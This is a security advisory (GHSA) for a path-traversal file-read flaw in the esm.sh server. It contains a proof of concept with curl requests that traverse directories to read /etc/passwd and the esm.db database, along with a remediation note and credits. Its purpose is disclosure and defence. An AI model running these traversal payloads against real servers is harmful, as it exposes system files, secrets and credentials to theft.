GHSA-49pv-gwxp-532r

Summary

A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise. Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.

Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168

Proof of Concept

1. Using this default config file that I copy from the repo, the server is running at http://localhost:9999 with this command go run server/esmd/main.go --config=config.json

   {
     "port": 9999,
     "npmRegistry": "https://registry.npmjs.org/",
     "npmToken": "******"
   }
   
   

2. Trigger the LFI vulnerability by sending this command below to read a local file

   # read /etc/passwd
   curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'
   
   # or read the database esm.db file
   curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'
   

<img width="3338" height="1906" alt="poc-image" src="https://github.com/user-attachments/assets/f3721e5d-a09c-4227-960a-35279ff52811" />

Remediation

Simply remove any .. in the URL path before actually process the file. See more details in this guide

Credits

• Ai Ho (Jessie)
• CL Yang